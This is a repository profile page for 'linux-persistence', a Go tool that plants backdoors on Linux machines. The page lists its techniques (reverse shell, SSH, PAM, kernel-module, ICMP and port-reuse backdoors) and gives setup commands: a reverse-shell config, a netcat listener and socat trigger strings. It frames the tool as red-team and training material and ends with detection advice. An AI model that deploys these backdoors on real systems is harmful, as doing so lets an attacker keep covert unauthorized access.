# linux-persistence: A Go-based Linux Persistence Tool for Security Research

This repository profile is provided by osrepos.com, an open source repository discovery platform.

Source: osrepos.com
Repository profile: https://osrepos.com/repo/maikefee-linux-persistence
Generated for open source discovery and AI-assisted research.

linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.

GitHub: https://github.com/Maikefee/linux-persistence
OSRepos URL: https://osrepos.com/repo/maikefee-linux-persistence

## Summary

linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.

## Topics

- Go
- Linux
- Persistence
- Security
- Penetration Testing
- Red Team
- Backdoor
- Ethical Hacking

## Repository Information

Last analyzed by OSRepos: Sat Oct 11 2025 22:12:52 GMT+0100 (Western European Summer Time)
Detail views: 5
GitHub clicks: 7

## Safety Notice

OSRepos shares public repositories for knowledge and discovery only. Review source code, dependencies, licenses, and security implications before running or installing anything.

## Content

## Introduction

`linux-persistence` is a robust Linux persistence tool, meticulously crafted in Go. It provides a comprehensive suite of techniques designed to maintain unauthorized access on Linux systems. This tool is intended solely for authorized security research, penetration testing, red team exercises, and security awareness training. Users are strongly advised to adhere to ethical guidelines and local laws, as misuse can lead to severe consequences.

The repository showcases a wide array of persistence methods, including reverse shells, SSH backdoors, hidden files, cron backdoors, Setuid backdoors, PAM backdoors, kernel module backdoors, ICMP backdoors, DNS backdoors, VIM backdoors, Strace backdoors, and port reuse backdoors. Each technique offers a unique approach to achieving and maintaining system access.

## Installation

To get `linux-persistence` up and running, you'll need to compile it from source. Ensure you have the necessary dependencies installed on your Linux system, including a GCC compiler, Linux kernel development headers, PAM development library, `iptables`, and `netcat` or `socat`.

First, clone the repository:
bash
git clone https://github.com/Maikefee/linux-persistence.git
cd linux-persistence


Then, compile the tool:
bash
go build -o linux-persistence main.go


## Examples

For optimal results, it is recommended to run `linux-persistence` with root privileges.

**Basic Usage:**
bash
sudo ./linux-persistence


**Configuration Options:**
You can customize various settings by modifying the `config` struct in `main.go` before compilation:
go
var config = Config{
    ReverseShellHost: "192.168.1.100",  // Reverse shell target host
    ReverseShellPort: 4444,             // Reverse shell target port
    BackdoorPort:     6666,             // VIM backdoor listening port
    HiddenProcess:    "systemd-resolved", // Hidden process name
    SSHBackdoorPort:  2222,             // SSH backdoor port
}


**Using the Reverse Shell:**
1.  **Prepare Listener:** On your attacker machine, start a netcat listener:
    bash
nc -lvp 4444
    
2.  **Run Tool:** On the target machine, execute the tool (it will attempt to connect to the configured `ReverseShellHost:ReverseShellPort`):
    bash
sudo ./linux-persistence
    

**Using the SSH Backdoor:**
After running the tool on the target, you can connect via SSH:
bash
ssh -p 2222 root@target_ip


**Port Reuse:**
Activate port reuse by sending a specific string:
bash
echo 'backdoor' | socat - tcp:target_ip:80

Deactivate port reuse:
bash
echo 'close' | socat - tcp:target_ip:80


**ICMP Backdoor:**
The ICMP backdoor is triggered by sending an ICMP packet containing the string "backdoor".

## Why Use `linux-persistence`?

`linux-persistence` stands out as a valuable resource for anyone involved in offensive security, security research, or defensive training. Its implementation in Go ensures efficiency and a relatively small footprint. The tool's strength lies in its comprehensive collection of diverse persistence techniques, offering practical insights into how adversaries maintain access on Linux systems.

For security professionals, it serves as an excellent educational platform to understand, simulate, and ultimately develop robust detection and protection strategies against various persistence mechanisms. The README also provides valuable information on detection methods (e.g., `netstat -an`, `ps aux`, `crontab -l`, `lsmod`) and protection recommendations (e.g., regular integrity checks, HIDS/NIDS deployment, restricting root privileges), making it useful for both red and blue teams.

## Links

*   **GitHub Repository:** [https://github.com/Maikefee/linux-persistence](https://github.com/Maikefee/linux-persistence)
*   **Blog Post URL:** [https://osrepos.jalab.pt/repo/maikefee-linux-persistence](https://osrepos.jalab.pt/repo/maikefee-linux-persistence)